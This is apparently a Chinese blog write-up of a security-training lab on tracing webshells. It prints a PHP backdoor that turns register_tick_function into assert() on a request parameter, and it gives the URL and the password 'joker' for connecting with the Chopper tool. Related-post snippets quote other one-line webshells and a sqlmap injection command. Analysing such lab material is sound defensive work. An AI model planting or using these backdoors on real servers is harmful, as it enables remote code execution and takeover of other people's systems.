墨者学院 - WebShell代码分析溯源(第10题)

最新推荐文章于 2022-11-28 12:14:00 发布
最新推荐文章于 2022-11-28 12:14:00 发布
阅读量501 收藏 2
点赞数
分类专栏: webshell Mozhe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42357070/article/details/81431620
版权

审查代码

1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码
2、没有新的发现,就去目录查找,根据最后的修改时间排查。

 

<?php
   error_reporting(0);
   $e = $_REQUEST['e'];
   declare(ticks=1);
   register_tick_function ($e, $_REQUEST['joker']);
?>

浏览器GET提交:http://www.xxx.com/10.php?e=assert&settoken=phpinfo();即可执行phpinfo();

菜刀连接用法: http://www.xxx.com/10.php?e=assert

密码:joker

详解:register_tick_function函数必须要和declare流程控制机制合并使用,那么就先了解一下declare和tick:Tick 是一个在 declare 代码段中解释器每执行 N 条低级语句就会发生的事件。N 的值是在 declare 中的 directive 部分用 ticks=N 来指定的。在每个 tick 中出现的事件是由 register_tick_function() 来指定的。也就是说当ticks=1,每执行1行代码,就需要运行一次我们传过来的assert()函数,$_REQUEST['joker']是参数

这样就构成了assert($_REQUEST['joker']) ,直接用菜刀链接一句话木马即可

多崎巡礼
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php 留言板 木马_PHP一句话木马研究
weixin_33365844的博客
03-09 403
*本文原创作者:Gxian,本文属于FreeBuf原创奖励计划,未经许可禁止转载最近在研究PHP一句话后门,查阅了很多大佬的博客,并从中衍生出了一些可用的方法。现总结如下:方案一:回调函数回调函数:Callback (即call then back 被主函数调用运算后会返回主函数),是指通过函数参数传递到其它代码的,某一块可执行代码的引用。已被D盾查杀的函数:array_filter()array...
墨者学院 - WebShell代码分析溯源(第1)
多崎巡礼的博客
07-27 1251
下载源码 使用seay源代码审计系统扫一扫(实在不想一个个去看。。。) seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg     下载出源代码,找到cn-right.php   &lt;?php error_reporting(0); $_GET['POST']($_POST['GET']); ?&gt; ...
php中register_tick_function和declare
zhoulib__的博客
03-10 745
注意:php7版本时会抛出异常 register_tick_function(funtion) 执行一次低级语法,执行一次里面的回调函数 declare(Tick=N) Tick(时钟周期)是一个在 declare 代码段中解释器每执行 N 条可计时的低级语句就会发生的事件。N 的值是在 declare 中的 directive 部分用 ticks=N 来指定的。 declare(ticks=1)...
php declare,php函数:declare与register_tick_function(二)
weixin_28952633的博客
03-10 166
摘要:昨天已经解释过declare与register_tick_function,那什么时候用到这些呢?今天就来稍微举例说明一下。register_tick_function可以看做一个回调函数,而这个函数...昨天已经解释过declare与register_tick_function,那什么时候用到这些呢?今天就来稍微举例说明一下。register_tick_function可以看做一个回调函数...
常见php函数绕过
huangyongkang666的博客
03-31 4144
PHP常见函数介绍 1. is_numeric() 函数 作用:检测变量是否为数字或数字字符串。 PHP 版本要求:PHP 4, PHP 5, PHP 7 is_numeric函数对于空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后 绕过: ?what=1' ?what=1, ?what=1%00 2.isset函数 **作用:**检测变量是否设置 格式:bool isset ( mixed var [, mixed var [, …]] ) 返回值: 若变量不存在则返
php registertickfunction,PHP register_tick_function 用法 手册 | 示例代码
weixin_29819639的博客
03-29 225
I tried the following on an IIS 6/PHP 5 machine:set_time_limit(0);functionprofiler($return=false){static$m=0;if($return) return$m." bytes";if(($mem=memory_get_usage()) >$m)$m=$mem;}register_tick_fu...
墨者学院 - WebShell代码分析溯源(第8)
多崎巡礼的博客
08-05 712
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。 C:\Users\BayernChenTutu\Desktop\www_bak\fields\class-wp-rest-comment-meta-style.php   &lt;?php error_reporting(0); ...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
3. **检测**:通过静态代码分析、动态运行时检测和漏洞扫描工具,可以发现潜在的代码执行风险。 4. **危害**:攻击者可以通过RCE漏洞执行任意命令,获取敏感信息,篡改数据,甚至完全控制服务器。 5. **修复**:最佳...
墨者学院WebShell代码分析溯源(第6)
vergilben的学习日记
04-03 9522
墨者学院WebShell代码分析溯源(第6) 进入环境: 下载并分析源码: 在如上路径中发现pic3.jpg.php,打开如下所示: 图中箭头指的很明显,是一句话木马,需要用到菜刀连接,但是后面很明显与base64有关,所以,我们需要一个指令来让它变成(xxx,一句话木马),思考一下这里应该是个插入语句,我们平常用到的,是eval函数,但我们看一下eval函数的解释: 所以eval函数是无...
墨者学院WebShell文件上传漏洞分析溯源(第2)
m0_66835614的博客
11-28 1197
墨者学院WebShell文件上传漏洞分析溯源(第2)
墨者学院-WebShell代码分析溯源(第10)
JimWu的博客
09-04 235
WebShell代码分析溯源(第10) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、记事本、菜刀 1.访问网页,下载网页源代码。 2.在/hack/static中找出了可疑的文件css.php 3.打开文件后,发现是一句话木马病毒。 我们首先分析一下代码,declare中的ticks是需要配合register_tick_function来使用的。 当ticks=1时,...
Bugku CTF 每日一 No one knows regex better than me
彼岸花苏陌的博客
01-18 655
No one knows regex better than me 翻译一下是正则 点进环境发现如下代码 <?php error_reporting(0); $zero=$_REQUEST['zero']; $first=$_REQUEST['first']; $second=$zero.$first; if(preg_match_all("/Yeedo|wants|a|girl|friend|or|a|flag/i",$second)){ $key=$second; if(pre
【WEB】webshell回调php总结
HAPPY
08-19 4274
 目录  经典一句话 利用简单的拼接字符串 利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧) 1. 利用 array_filter+base64_decode 2.利用array_map+base64_decode 3.利用uasort+base64_decode  4.利用array_walk+preg_replace 5.利用array_walk_recurs...
墨者学院 - SQL注入漏洞测试(POST)
多崎巡礼的博客
08-20 5346
和最开始拿到sql注入不一样,注入点不再是公告了,二是登陆页面的账号栏,简单的语句就能得到错误回显 根据目提示,post请求 1)随便输入用户名和密码,然后使用 burp抓取登录界面的post包,保存为txt; 2)将txt放在sqlmap目录下; 3)打开sqlmap,使用post注入; sqlmap.py -r 文件路径/文件名 --dbs  //证明可以注入,且获取所有数据库名...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,攻击者可能会尝试利用X-F字段进行SQL注入攻击。为了防止SQL注入攻击,开发人员应该合理地验证和过滤用户输入,并使用参数化查询或预编译语句来防止SQL注入攻击。此外,最好避免将用户输入直接拼接到SQL查询中。墨者学院可能提供相关的课程或教程来帮助开发人员学习和理解如何防止SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值